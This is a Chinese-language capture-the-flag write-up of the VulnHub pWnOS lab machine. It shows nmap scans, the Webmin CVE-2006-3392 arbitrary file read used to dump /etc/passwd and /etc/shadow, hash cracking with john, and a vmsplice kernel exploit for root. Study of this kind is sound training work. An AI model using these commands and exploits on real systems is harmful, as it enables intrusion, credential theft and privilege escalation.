vulnhub(8):pWnOS(还没信息收集就已经成功打点)
端口
nmap主机发现
nmap -sn 192.168.89.0/24 Nmap scan report for 192.168.89.116 Host is up (0.00020s latency). 116是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.89.116 -p- --min-rate 10000 -oA nmap/scan 扫描开放端口保存到 nmap/scan下 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmt 发现开放3个端口
nmap -sT -sC -sV -O -p22,80,111 -oA nmap/scan 192.168.89.116详细端口扫描: -sT:完整tcp连接 -sC:默认脚本扫描 -sV:服务版本探测 -O:系统信息探测 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) | ssh-hostkey: | 1024 e44640bfe629acc600e2b2a3e150903c (DSA) |_ 2048 10cc35458ef27aa1ccdba0e8bfc7733d (RSA) 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) |_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME) 445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME) 10000/tcp open http MiniServ 0.01 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). MAC Address: 00:0C:29:5E:18:C9 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6.22 OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h30m01s, deviation: 3h32m07s, median: 1s | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) |_smb2-time: Protocol negotiation failed (SMB2) | smb-os-discovery: | OS: Unix (Samba 3.0.26a) | Computer name: ubuntuvm | NetBIOS computer name: | Domain name: nsdlab | FQDN: ubuntuvm.NSDLAB |_ System time: 2024-09-14T00:04:37-05:00 分析: 22 ssh端口开放 80 web端口开放 139 445 都是smaba服务 10000 是http协议,webmin服务
漏洞脚本扫描 PORT STATE SERVICE 19:44:20 [5/103] 22/tcp open ssh 80/tcp open http |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled | http-enum: | /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6' | /index/: Potentially interesting folder |_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6' |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. 139/tcp open netbios-ssn 445/tcp open microsoft-ds 10000/tcp open snet-sensor-mgmt | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure | http://www.exploit-db.com/exploits/1997/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 MAC Address: 00:0C:29:5E:18:C9 (VMware) Host script results: |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) 好家伙,直接webmin爆出了个文件披露的漏洞,还成功了,直接用就完事了
立足
10000端口
手里面有漏洞了,先利用漏洞,不成功再来收集其他端口信息 searchsploit webmin 找到两个脚本可以利用 Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl 两个脚本都看看,发现2017.pl脚本有利用提示,直接选择利用更简单的perl脚本 ./2017.pl 192.168.89.116 10000 /etc/passwd 0 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash obama:x:1001:1001::/home/obama:/bin/bash osama:x:1002:1002::/home/osama:/bin/bash yomama:x:1003:1003::/home/yomama:/bin/bash 收集到4个可能是管理员创建的用户,加上root5个用户vmware、obama、osama、yomama、root 再看看别的:./2017.pl 192.168.89.116 10000 /etc/shadow 0 root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7::: daemon:*:14040:0:99999:7::: bin:*:14040:0:99999:7::: sys:*:14040:0:99999:7::: sync:*:14040:0:99999:7::: games:*:14040:0:99999:7::: man:*:14040:0:99999:7::: lp:*:14040:0:99999:7::: mail:*:14040:0:99999:7::: news:*:14040:0:99999:7::: uucp:*:14040:0:99999:7::: proxy:*:14040:0:99999:7::: www-data:*:14040:0:99999:7::: backup:*:14040:0:99999:7::: list:*:14040:0:99999:7::: irc:*:14040:0:99999:7::: gnats:*:14040:0:99999:7::: nobody:*:14040:0:99999:7::: dhcp:!:14040:0:99999:7::: syslog:!:14040:0:99999:7::: klog:!:14040:0:99999:7::: mysql:!:14040:0:99999:7::: sshd:!:14040:0:99999:7::: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7::: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7::: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7::: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7::: 这下可以尝试破解下hash了
john破解hash
hash保存在文件hash.txt中 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 破解出vmware用户密码h4ckm3 ssh登录会显示: Unable to negotiate with 192.168.139.116 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ssh obama@192.168.89.116 -oHostKeyAlgorithms=ssh-rsa,ssh-dss 这里ssh登录需要使用-oHostKeyAlgorithms和服务器协商一下验证算法 具体详细的ssh验证流程,可以看我的文章:红队ssh协议通信全流程以及安全研究-CSDN博客
提权
信息枚举
sudo -l:无权限 cat /etc/passwd:没有新的信息 cat /etc/crontab:没有计划任务脚本 find / -type f -perm -u=s 2>/dev/null: /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/mtr /usr/bin/passwd /usr/bin/smbumount /usr/bin/chfn /usr/bin/sudoedit /usr/bin/newgrp /usr/bin/arping /usr/bin/gpasswd /usr/bin/smbmnt /usr/bin/at /usr/bin/chsh /usr/sbin/pppd /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/apache2/suexec /bin/su /bin/umount /bin/ping /bin/ping6 /bin/check-foreground-console /bin/fusermount /bin/mount /sbin/mount.cifs /sbin/umount.cifs /lib/dhcp3-client/call-dhclient-script 尝试过/usr/bin/sudoedit,看到了一个关于sudoedit的漏洞正好与sudo版本匹配,exploit db编号是470.c,但好像越权读取文件的,我们不需要
内核漏洞提权
uname -a:获取一下版本 Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux searchsploit linux 2.6.2 发现提权漏洞版本匹配 Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Esca | linux/local/5092.c 传到靶机,编译,运行,root